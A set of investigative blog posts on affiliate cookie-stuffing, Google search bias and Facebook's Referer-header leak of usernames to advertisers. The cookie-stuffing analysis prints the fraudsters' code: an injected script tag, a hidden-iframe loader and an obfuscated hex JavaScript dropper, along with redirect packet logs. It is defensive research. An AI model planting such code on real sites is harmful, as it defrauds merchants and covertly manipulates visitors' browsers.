In each instance, the hostile code appears as a brief JavaScript addition to an otherwise-legitimate site. See the single line of inserted code highlighted in yellow below. Notably, the hostile code appears within a block of code embedding comScore tags (green highlighting below) — a place where site designers expect to see external JavaScript references, making the Bannertracker-script insertion that much less likely to be detected.

<!-- Begin comScore Tag -->
<script type="text/javascript" src="http://www.bannertracker-script.com/banner/ads.php?a=big"></script>
<script type="text/javascript">document.write("<img id='img1' height='1' width='1'>");
document.getElementById("img1").src="http://beacon.scorecardresearch.com/scripts/beacon.dll?C1=2&C2=5915554&C3=5915554&C4=www.redflagdeals.com&C5=&C6=&C7=" + escape(window.location.href) + "&C8=" + escape(document.title) + "&C9=" + escape(document.referrer) + "&rn=" + Math.floor(Math.random()*99999999);</script><!-- End comScore Tag -->

Examining Bannertracker-script insertions on other sites, we found them in other inconspicuous places — for example, just before the </HTML> tag that ends a page.
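One way a site operator might look for this kind of insertion is to list every external script host on a page and compare it against the hosts the site is known to use. The Python sketch below is only an illustration of that idea, not the automation described above. The sample page, the first-party script path, and the allowlist are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptSrcCollector(HTMLParser):
    """Collect the host of every <script src="..."> on a page."""

    def __init__(self):
        super().__init__()
        self.hosts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                host = urlparse(src).hostname
                if host:  # relative URLs have no host and are skipped
                    self.hosts.append(host)

def unexpected_script_hosts(html, expected_hosts):
    """Return script hosts that are not in the site's own allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    return [h for h in collector.hosts if h not in expected_hosts]

# Hypothetical page: one first-party script plus the inserted line.
page = """<!-- Begin comScore Tag -->
<script type="text/javascript" src="http://www.bannertracker-script.com/banner/ads.php?a=big"></script>
<script type="text/javascript" src="http://forums.redflagdeals.com/clientscript/example.js"></script>
<!-- End comScore Tag -->"""

print(unexpected_script_hosts(page, {"forums.redflagdeals.com"}))
```

An allowlist is only as good as its upkeep, and this check would miss scripts injected at run time, so it is a first filter rather than proof of a clean page.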

Cookie-Stuffing by Bannertracker-script

As a result of the hack-based code insertion shown above, a user visiting any affected site receives Bannertracker-script code also. That code creates an invisible IFRAME which loads the Amazon site via an affiliate link. Here’s how: First, the code creates a doubly-invisible DIV (CSS style of visibility:hidden and display:none, shown in blue highlighting below). The code then creates an invisible IFRAME within that DIV (CSS display:none, visibility:hidden, size of 0x0 pixels, shown in purple highlighting below). The code instructs that the IFRAME load a URL on Http-uptime.com (grey) which redirects through to an Amazon Associates affiliate link with affiliate ID camerlucidpho-20 (red). See also the full packet log.

GET /banner/ads.php?a=big HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.bannertracker-script.com

HTTP/1.1 200 OK …
GPad = {
  init: function () {
    document.write('<div id="GPAD" style="visibility:hidden; display:none;"></div>');
    var frame = document.createElement('iframe');
    frame.setAttribute('src', 'http://www.http-uptime.com/banner/index.php');
    frame.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');
    frame.style.visibility = 'hidden';
    frame.style.display = 'none';
    var div = document.getElementById('GPAD');
    div.appendChild(frame);
  }
}
GPad.init();

GET /index.php HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.http-uptime.com

HTTP/1.1 200 OK …
<html><head><meta http-equiv="refresh" content="0;url=http://www.http-uptime.com/icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932" />
</head></html>

GET /icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932 HTTP/1.1 …
Host: www.http-uptime.com

HTTP/1.1 302 Moved Temporarily …
Location: http://www.amazon.com/gp/search?ie=UTF8&keywords=&tag=camerlucidpho-20&index=pc-hardware&linkCode=ur2&camp=1789&creative=932

The net effect is to load Amazon’s site invisibly. Amazon operates using a 24-hour referral period, so if a user happened to make a purchase from Amazon within the next 24 hours, Amazon would credit this affiliate as the putative referrer of the traffic, paying this affiliate a commission of at least 4% and as much as 15%.
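The affiliate ID can be read directly out of the wrapper URL in the packet log, because the Amazon link travels percent-encoded inside the `url` parameter. A minimal Python sketch, using only the standard library; the function name is illustrative:

```python
from urllib.parse import urlparse, parse_qs

def affiliate_tag_from_wrapper(wrapper_url):
    """Return the Associates tag carried inside a wrapper URL's `url` parameter."""
    outer = parse_qs(urlparse(wrapper_url).query)
    # parse_qs percent-decodes values, so the inner URL comes back in plain form.
    inner_urls = outer.get("url", [])
    if not inner_urls:
        return None
    inner = parse_qs(urlparse(inner_urls[0]).query)
    tags = inner.get("tag", [])
    return tags[0] if tags else None

# The blank.php request from the packet log above.
wrapper = (
    "http://www.http-uptime.com/icons/blank.php?url=http%3A%2F%2Fwww.amazon.com"
    "%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20"
    "%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932"
)
print(affiliate_tag_from_wrapper(wrapper))  # prints: camerlucidpho-20
```

Applied across many captured requests, the same extraction would give a running list of the IDs a perpetrator rotates through.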

Concealment by Bannertracker-script

The preceding discussion noted two mechanisms by which Bannertracker-script attempted to conceal its actions. First, it placed its tags within the comScore section of affected sites, where unfamiliar code is less likely to attract suspicion. Second, it loaded its tags invisibly, including via the multiple nested invisible elements detailed above. Still, by sending so much traffic to Amazon, Bannertracker-script clearly recognized that it risked attracting scrutiny from Amazon, which might question how one affiliate obtained so much traffic. Bannertracker-script therefore turned to multiple Amazon Associates IDs. In our testing, we found more than 200 such IDs, of which we report 20 below:

abacemedi-20       aledesoftw-20       anybr-20           arizonosteopc-20
actkid-20          allesbluefree-20    apa0c5-20          artofdri-20
adirooutdocom-20   alsjopa-20          apitherapy03-20    astba-20
afrkilbeemov-20    amergumbmachc-20    apitroservic-20    atlcitgam-20
ajelcand-20        ancestorville-20    arasmazi-20        babblu-20

Using multiple IDs raises a further risk for Bannertracker-script: A diligent investigator might request the Bannertracker-script site repeatedly in order to attempt to learn most or all of Bannertracker-script’s IDs. Bannertracker-script attempted to reduce this risk via server-side logic to avoid serving the same user with two different IDs, based on variables that seem to include client IP address, HTTP User-agent header, and more.

In principle, investigators might recognize Bannertracker-script by its distinctive domain name. But in fact we have seen this perpetrator also using other domain names. (We refer to the perpetrator as Bannertracker-script because that was the first such domain we found and, in our testing, still the most frequent.)

Affected Merchants

To date, we have primarily seen Bannertracker-script targeting Amazon. But other merchants are vulnerable to similar attacks that drop a large number of cookies invisibly in hopes that users make purchases from the corresponding merchants. In this regard, large merchants are particularly vulnerable: The more popular a merchant is, the greater the likelihood of a given user making a purchase from that merchant in a given time period. Indeed, we have also seen Bannertracker-script using the same technique to drop cookies for several adult web sites.

Amazon’s exposure is somewhat reduced by its 24-hour affiliate commission window — paying commission to affiliates only on a user’s purchases within 24 hours of invocation of an affiliate link, whereas other merchants often grant credit for as long as 30 days. But Amazon’s large and growing popularity limits the effectiveness of this measure. Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. If Bannertracker-script can deposit one million Amazon cookies, via hacks of multiple popular sites, it will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents — substantial revenue, particularly given the prospect of hacking other vulnerable web sites. Ordinarily, one might expect Amazon to notice a new affiliate with a large spike in earnings. But by spreading its commissions across hundreds of affiliate accounts, Bannertracker-script may avoid or deflect such scrutiny.

We have reported this matter to our contacts at Amazon and will update this post with any information Amazon cares to share.

Large-Scale Cookie-Stuffing at Eshop600.co.uk with Wesley Brandi

We have recently been testing web sites that drop affiliate cookies invisibly — claiming to have referred users to the corresponding merchants’ sites, when in fact users never asked to visit the merchants’ sites and never saw the merchants’ sites. Nonetheless, through invisible IFRAMEs, invisible IMG tags, and similar constructs, these pages manage to set affiliate cookies indicating that referrals occurred. Then, if users happen to make purchases from the targeted merchants, the cookie-stuffers collect affiliate commissions. With commissions as large as 40%, this tactic can be lucrative.

One large offender we recently found: Eshop600.co.uk. In automated and manual testing, we found 36 pages on the Eshop600 site, including the site’s home page, which drop dozens of cookies invisibly. To a user glancing at a web browser, the Eshop600 site looks perfectly normal:

The Eshop600 site

But within the affected Eshop600 pages are 26 blocks of encoded JavaScript code. An example:

var i,y,x="3c696d672069643d22706963333722207372633d22....";y="";var _0x70c3=["\x6C\x65\x6E\x67\x74\x68","\x25","\x73\x75\x62\x73\x74\x72","\x77\x72\x69\x74\x65"];for(i=0;i<x[_0x70c3[0]];i+=2){ y+=unescape(_0x70c3[1]+x[_0x70c3[2]](i,2));} ;document[_0x70c3[3]](y);
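The obfuscation is light. The lookup array holds hex escapes that spell `length`, `%`, `substr`, and `write`, so the loop simply walks `x` two characters at a time, treats each pair as a hex byte, and writes the result into the page. A minimal Python sketch of the same decoding follows, applied only to the prefix of `x` visible in the excerpt; the rest of the string is elided there and is not reconstructed here.

```python
def decode_hex_payload(hex_text):
    """Turn a string of two-character hex codes into the text it encodes."""
    return bytes.fromhex(hex_text).decode("latin-1")

# Only the portion of x shown in the excerpt; the remainder is elided.
visible_prefix = "3c696d672069643d22706963333722207372633d22"
print(decode_hex_payload(visible_prefix))  # prints: <img id="pic37" src="
```

Even this short prefix shows that the payload begins with an IMG tag.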

We decoded this JavaScript to find an invisible IMG tag.

<img width="75" height="100" id="pic37" style="display: none;" alt=" " src="http://www.tkqlhce.com/click-3910892-5590799"/>

Note the CSS STYLE of display:none (yellow highlighting) which makes the entire tag invisible. In any event, the 75×100 size (green highlighting) is too small to load a genuine web page. Nonetheless, a trace of the redirect sequence shows that the IMG does indeed redirect through an affiliate network (ValueClick’s Commission Junction) (red) and on to an affiliate merchant (blue).

GET /click-3910892-5590799 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.eshop600.co.uk/discount-voucher-codes.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.tkqlhce.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.tkqlhce.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 30 Jan 2012 00:26:02 GMT
Location: http://www.apmebf.com/oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB<
Content-Type: text/html
Connection: close
Transfer-Encoding: chunked
Date: Mon, 30 Jan 2012 00:26:01 GMT

---

GET /oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB< HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.eshop600.co.uk/discount-voucher-codes.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.apmebf.com

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 30 Jan 2012 00:26:07 GMT
Location: http://www.kdukvh.com/rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm<
Set-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMT
Set-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMT
Content-Type: text/html
Connection: close
Transfer-Encoding: chunked
Date: Mon, 30 Jan 2012 00:26:07 GMT

---

GET /rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm< HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.eshop600.co.uk/discount-voucher-codes.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.kdukvh.com

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.kdukvh.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 30 Jan 2012 00:26:18 GMT
Location: http://www.argos.co.uk/webapp/wcs/stores/servlet/ArgosCreateReferral?storeId=10001&referrer=COJUN&cmpid=COJUN&referredURL=&_%24ja=tsid%3A11674%7Cprd%3A3910892
Set-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMT
Set-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMT
Set-Cookie: PBLP=849260:3910892:1327883178648:cjo; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMT
Content-Type: text/html
Connection: close
Transfer-Encoding: chunked
Date: Mon, 30 Jan 2012 00:26:18 GMT
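To summarize a trace like this one, it can help to pull out just the host named in each Location header, which gives the redirect chain at a glance. The Python sketch below assumes nothing about the log beyond the presence of `Location:` headers. The sample uses the hosts from the trace above, with paths and query strings trimmed for brevity.

```python
import re

# Capture the host that follows "Location: http://" or "Location: https://".
LOCATION_HOST = re.compile(r"Location:\s*https?://([^/\s]+)", re.IGNORECASE)

def redirect_hosts(packet_log):
    """List the host of each Location header, in order of appearance."""
    return LOCATION_HOST.findall(packet_log)

# Abbreviated sample: hosts as in the trace, paths and queries trimmed.
sample = (
    "HTTP/1.1 302 Found\n"
    "Location: http://www.apmebf.com/oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q\n"
    "HTTP/1.1 302 Found\n"
    "Location: http://www.kdukvh.com/rb101ox54P/x38/QQULSUU/OUMLTUN/L/\n"
    "HTTP/1.1 302 Found\n"
    "Location: http://www.argos.co.uk/webapp/wcs/stores/servlet/ArgosCreateReferral\n"
)
print(redirect_hosts(sample))
```

The first two hosts are the affiliate network's tracking domains and the last is the merchant, so the final entry identifies whose cookie was dropped.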

Of course www.argos.co.uk is just one of dozens of merchants affected. Below are 26 merchants we’ve found targeted by Eshop600, including merchants using affiliate networks Affiliate Window (AW), Commission Junction (CJ), TradeDoubler (TD), and Perfiliate (now owned by Affiliate Window).

direct.asda.com (AW)              www.britishairways.com (AW)   www.dorothyperkins.com (AW)   www.screwfix.com (AW)
groceries.asda.com (Perfiliate)   www.burton.co.uk (AW)         www.evans.co.uk (AW)          www.sky.com (AW)
phone-shop.tesco.com (TD)         www.comet.co.uk (AW)          www.halfords.com (AW)         www.tesco.com (TD)
store.three.co.uk (Perfiliate)    www.currys.co.uk (AW)         www.hsamuel.co.uk (AW)        www.vodafone.co.uk (AW)
www.annsummers.com (AW)           www.debenhams.com (AW)        www.johnlewis.com (AW)        www.wilkinsonplus.com (AW)
www.argos.co.uk (CJ)              www.dixons.co.uk (AW)         www.missselfridge.com (AW)
www.asda.co.uk (Perfiliate)       www.diy.com (AW)              www.pcworld.co.uk (AW)

Beyond encoded JavaScript, Eshop600 also tried other methods to avoid detection. Load an Eshop600 page repeatedly, and it won’t stuff cookies every time; the site is clearly attempting to recognize repeat visitors to avoid restuffing the same users more than once. That makes Eshop600’s practice harder to replicate (an extra challenge for anyone trying to prove an infraction) and helps reduce telltale signs in merchants’ logs.

On one view, these practices are nothing new: Ben has been writing these up since 2004. But affiliate merchants and networks need to remain vigilant to catch these cheaters. We’re finding many dozens of affiliate cookie-stuffers per month, along with other rogue affiliates using spyware/adware, typosquatting, and more. It’s not unusual for cheaters to be among a merchant’s largest affiliates; for example, the 2010 indictment of Shawn Hogan alleges that he was the single largest affiliate in eBay’s affiliate program in 2006-2007, collecting more than $15 million over 18 months. Now, most affiliate programs are far smaller than eBay’s, yielding a correspondingly lower opportunity for fraud. But for mid-sized merchants, there are typically large savings in catching and ejecting all rule-breakers.

Apple in-app purchase litigation

I served as co-counsel in class action litigation challenging Apple’s practices of charging users for purchases made by kids, refusing refunds to such users, and allowing purchases (and charging users’ credit cards) without users reentering their passwords to authorize the purchases. In response, Apple agreed to grant refunds to customers who so requested.

In Re In-App Purchase Litigation, Case No. 5:11-CV-01758-EJD (N.D. Cal.)

Case docket including consolidated class action complaint

Hard-Coding Bias in Google “Algorithmic” Search Results

I present categories of searches for which available evidence indicates Google has “hard-coded” its own links to appear at the top of algorithmic search results, and I offer a methodology for detecting certain kinds of tampering by comparing Google results for similar searches. I compare Google’s hard-coded results with Google’s public statements and promises, including a dozen denials but at least one admission. I conclude by analyzing the impact of Google’s tampering on users and competition, and by proposing principles to block Google’s bias.

Details, including screenshots, methodology, proposed regulatory response, and analogues in other industries:

Hard-Coding Bias in Google “Algorithmic” Search Results

Facebook Leaks Usernames, User IDs, and Personal Details to Advertisers (updated May 26, 2010)

Browse Facebook, and you wouldn’t expect Facebook’s advertisers to learn who you are. After all, Facebook’s privacy policy and blog posts promise not to share user data with advertisers except when users grant specific permission. For example, on April 6, 2010 Facebook’s Barry Schnitt promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.”

My findings are exactly the contrary: Merely clicking an advertiser’s ad reveals to the advertiser the user’s Facebook username or user ID. With default privacy settings, the advertiser can then see almost all of a user’s activity on Facebook, including name, photos, friends, and more.

In this article, I show examples of Facebook’s data leaks. I compare these leaks to Facebook’s privacy promises, and I point out that Facebook has been on notice of this problem for at least eight months. I conclude with specific suggestions for Facebook to fix this problem and prevent its recurrence.

Details of the Data Leak

Facebook’s data leak is straightforward: Consider a user who clicks a Facebook advertisement while viewing her own Facebook profile, or while viewing a page linked from her profile (e.g. a friend’s profile or a photo). Upon such a click, Facebook provides the advertiser with the user’s Facebook username or user ID.

Facebook leaks usernames and user IDs to advertisers because Facebook embeds usernames and user IDs in URLs which are passed to advertisers through the HTTP Referer header. For example, my Facebook profile URL is http://www.facebook.com/bedelman. Notice my username (yellow).

Of course, it would be incorrect to assume that a person looking at a given profile is in fact the owner of that profile. A request for a given profile might reflect that user looking at her own profile, but it might instead be some other user looking at the user’s profile. However, when a user views her own profile page, Facebook automatically embeds a “profile” tag (green) in the URL:

http://www.facebook.com/bedelman?ref=profile

Furthermore, when a user clicks from her profile page to another page, the resulting URL still bears the user’s own user ID or username, along with the details of the later-requested page. For example, when I view a friend’s profile, the resulting URL is as shown below. Notice the continued reference to my username (yellow) and the fact that this is indeed my profile (green), along with an appendage naming the user whose page I am now viewing (blue).

http://www.facebook.com/bedelman?ref=profile#!/pacoles

Each of these URLs is passed to advertisers whenever a user clicks an ad on Facebook. For example, when I clicked a Livingsocial ad on my own profile page, Facebook redirected me to the advertiser, yielding the following traffic to the advertiser’s server. Notice the transmission in the Referer header (red) of my username (yellow) and the fact that I was viewing my own profile page (green).

GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile

Host: livingsocial.com

The same transmission occurs when a user clicks from her profile page to a friend’s page. For example, I clicked through to a friend’s profile, http://www.facebook.com/bedelman?ref=profile#!/pacoles, where I clicked another Livingsocial ad. Again, Facebook’s redirect caused my browser to transmit in its Referer header (red) my username (yellow) and the fact that that username reflects my personal profile (green). Interestingly, my friend’s username was omitted from the transmission because it occurred after a pound sign, causing it to be automatically removed from Referer transmission.

GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile

Host: livingsocial.com
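The pound-sign behavior is easy to reproduce: browsers drop the fragment (everything from `#` onward) before sending a URL as a Referer. A minimal Python sketch using the standard library's `urldefrag`; the function name is illustrative, and the sketch models only the fragment removal, not any other browser-specific Referer handling.

```python
from urllib.parse import urldefrag

def referer_sent(page_url):
    """Approximate the Referer value for a page: its URL minus any fragment."""
    return urldefrag(page_url).url

print(referer_sent("http://www.facebook.com/bedelman?ref=profile#!/pacoles"))
# prints: http://www.facebook.com/bedelman?ref=profile
```

The friend's username after the pound sign disappears, but the clicking user's own username and the `ref=profile` tag both sit before it and so are still transmitted.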

In further testing, I confirmed that the same transmission occurs when a user clicks from her profile page to a photo page, or to any of various other pages linked from a user’s profile.

With a Facebook member’s username or user ID, current Facebook defaults allow an advertiser (and anyone else) to obtain a user’s name, gender, other profile data, picture, friends, networks, wall posts, photos, and likes. Furthermore, the advertiser already knows the user’s basic demographics, since the advertiser knows the user fits the profile the advertiser had requested from Facebook. For example, in grey highlighting above, the advertiser learned from Facebook my age, gender, and geographic location.

Facebook’s Contrary Statements about User Privacy vis-a-vis Advertisers

Facebook has made specific promises as to what information it will share with advertisers. For one, Facebook’s privacy policy promises “we do not share your information with advertisers without your consent” (section 5). Then, in section 7, Facebook lists eleven specific circumstances in which it may share information with others — but none of these circumstances applies to the transmission detailed above.

Facebook’s recent blog postings also deny that Facebook shares users’ identities with advertisers. In an April 6, 2010 post, Facebook promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.” Facebook’s prior postings were similar. July 1, 2009: “Facebook does not share personal information with advertisers except under the direction and control of a user. … You can feel confident that Facebook will not share your personal information with advertisers unless and until you want to share that information.” December 9, 2009: “Facebook never shares personal information with advertisers except under your direction and control.” As to all these claims, I disagree. Sharing a username or user ID upon a single click, without any disclosure or indication that such information will be shared, is not at a user’s direction and control.

Facebook Has Been on Notice of This Problem for Eight Months

AT&T Labs researcher Balachander Krishnamurthy and Worcester Polytechnic Institute professor Craig Wills previously identified the general problem of social networks leaking user information to advertisers, including leakage through the Referer headers detailed above. In August 2009, their On the Leakage of Personally Identifiable Information Via Online Social Networks was posted to the web and presented at the Workshop on Online Social Networks (WOSN).

Through Krishnamurthy and Wills’ research, Facebook eight months ago received actual notice of the data leakage at issue. A September 2009 MediaPost article confirms Facebook’s knowledge through its spokesperson’s response. However, Facebook spokesperson Simon Axten seriously understated the severity of the data leak: Axten commented “The average Facebook user views a number of different profile pages over the course of a session …. It’s thus difficult for a tracking website to know whether the identifier belongs to the person being tracked, or whether it instead belongs to a friend or someone else whose profile that person is viewing.” I emphatically disagree. As shown above, when a user views her own profile, or a page linked from her own profile, the “?ref=profile” tag is added to the URL, exactly confirming the identity of the profile owner.
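To make concrete how little inference is needed, the Python sketch below shows the check a receiving server could apply to a Referer value. It covers only the username-style URL shown in this article; the function name and the accepted host list are illustrative assumptions, and other Facebook URL formats are not handled.

```python
from urllib.parse import urlparse, parse_qs

def profile_owner_from_referer(referer):
    """Return the username in a Facebook Referer tagged ref=profile, else None."""
    parts = urlparse(referer)
    if parts.hostname not in ("www.facebook.com", "facebook.com"):
        return None
    # Without the tag, the viewer may be looking at someone else's profile.
    if parse_qs(parts.query).get("ref") != ["profile"]:
        return None
    return parts.path.strip("/") or None

print(profile_owner_from_referer("http://www.facebook.com/bedelman?ref=profile"))
# prints: bedelman
print(profile_owner_from_referer("http://www.facebook.com/pacoles"))
# prints: None
```

Without the tag, the ambiguity Axten describes does exist; with it, the identifier is attributable to the person who clicked.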

What Facebook Should Do

Since receiving actual notice of these data leaks, Facebook has implemented scores of new features for advertising, monetization, information-sharing, and reorganization. Inexplicably, Facebook has failed to address leakage of user information to advertisers. That’s ill-advised and short-sighted: Users don’t expect ad clicks to reveal their names and details, and Facebook’s privacy policy and blog posts promise to honor that expectation. So Facebook needs to adjust its actual practices to meet its promises.

Preventing advertisers from receiving usernames and user IDs is strikingly straightforward: A modified redirect can mask referring URLs. Currently, Facebook uses a simple HTTP 301 redirect, which preserves referring URLs — exactly creating the problem detailed above. But a FORM POST redirect, META REFRESH redirect, or JavaScript redirect could conceal referring URLs — preventing advertisers from receiving username or user ID information.

Instead, Facebook has partially implemented the pound sign method described above — putting some, but not all, sensitive information after a pound sign, with the result that sometimes this information is not transmitted as a Referer. If fully implemented across the Facebook site, this approach might prevent the data leakage I uncovered. However, in my testing, numerous within-Facebook links bypass the pound sign masking. In any event, an improved redirect would be much simpler to implement — requiring only a single adjustment to the ad click-redirect script, rather than requiring changes to URL formats across the Facebook site.
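As a rough illustration of the redirect change, the Python sketch below builds a minimal interstitial page that forwards the browser via META REFRESH. The function name and destination URL are hypothetical. The sketch assumes the interstitial's own URL carries no username or user ID, and how browsers populate Referer after a META REFRESH varies, so this shows the idea rather than a tested fix.

```python
from html import escape

def meta_refresh_interstitial(destination_url):
    """Build a minimal HTML page that forwards the browser via META REFRESH."""
    # Escape the URL so characters such as & and " are safe inside the attribute.
    safe_url = escape(destination_url, quote=True)
    return (
        "<html><head>"
        f'<meta http-equiv="refresh" content="0;url={safe_url}">'
        "</head></html>"
    )

# Hypothetical advertiser landing page.
page = meta_refresh_interstitial("http://advertiser.example/landing?a=1&b=2")
print(page)
```

Because the advertiser's request is then triggered from the interstitial rather than from the profile page, the profile URL is no longer what the browser has available to send as the Referer.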

Finally, Facebook should inform users of what has occurred. Facebook should apologize to users, explain why it didn’t live up to its explicit privacy commitments, and establish procedures — at least robust testing, if not full external review — to assure that users’ privacy is correctly protected in the future.

Update – May 26, 2010

On May 20, 2010, the Wall Street Journal reported the problem detailed above. On or about that same day, Facebook removed the ref=profile tags that were the crux of the data leak.

Yesterday I spoke with Arturo Bejar, a Facebook engineer who investigated this problem. Arturo told me that after Krishnamurthy and Wills’ article, he reviewed relevant Facebook systems in search of leakage of user information. At that time, he found none, in that Facebook revealed the URLs users were browsing when they clicked ads, but did not indicate whether the user clicking a given ad was in fact the owner of the profile showing that ad. However, in a subsequent Facebook redesign, beginning in February 2010, Facebook user home pages received a new “profile” button which carried the ref=profile URL tags I analyze above. Because this tag was added without a further privacy review, Arturo tells me that he and others at Facebook did not consider the interaction between this tag and the problem I describe above. Arturo says that’s why this problem occurred despite the prior Krishnamurthy and Wills article.

Arturo also pointed out that the problem I describe did not affect advertisers whose landing pages were pages on Facebook (rather than advertisers’ own external sites).

Meanwhile, Facebook’s May 24 “Protecting Privacy with Referrers” presents Facebook’s view of the problem in greater detail. Facebook’s posting offers a fine analysis of the various methods of redirects and Facebook’s choice among them. It’s worth a read.

After discussing the problem with Arturo and reading Facebook’s new post, I reached a more favorable impression of Facebook’s response. But my view is tempered by Facebook’s ill-advised attempts to downplay the breach.

  • Rather than affirmatively describing the specific design flaw, Facebook’s post describes what “could” “potentially” occur. Facebook’s post never gives a clear affirmative statement of the problem.
  • Facebook says advertisers would need to “infer” a user’s username/ID. But usernames and IDs are sent directly, in clear and unambiguous URLs, hardly requiring complex analysis.
  • Facebook claims that the breach affected only “one case … if a user takes a specific route on the site” (WSJ quote). Facebook also calls the problem “a rarely occurring case” (posting). I dispute these characterizations. It is hardly “rare” for a user to view her own profile. To view her own profile and click an ad? There’s no reason to think that’s any less frequent than clicking an ad elsewhere. To view her own profile, click through to another page, and then click an ad? That’s perfectly standard. Furthermore, although Facebook told the Journal there is “one case” in which data is leaked improperly, in fact I’ve found many such cases including clicking from profile to ad, from profile to friend’s page to ad, and from profile to photo page to ad, to name three.
  • Through transmission in HTTP Referer headers, usernames and IDs appear to reach advertisers’ web servers in a manner such that default server log files would store this data indefinitely, and default analytics would tabulate it accordingly. Facebook says it has “no reason to believe that any advertisers were exploiting” the data breach I reported, but the fact is, this data ends up in a place where advertisers could (and, as to historic data, still can) access it easily, using standard tools, and at their convenience.
  • Although Facebook’s post says the problem is “potential,” I found that a user’s username/ID is sent with each and every click in the affected circumstances.

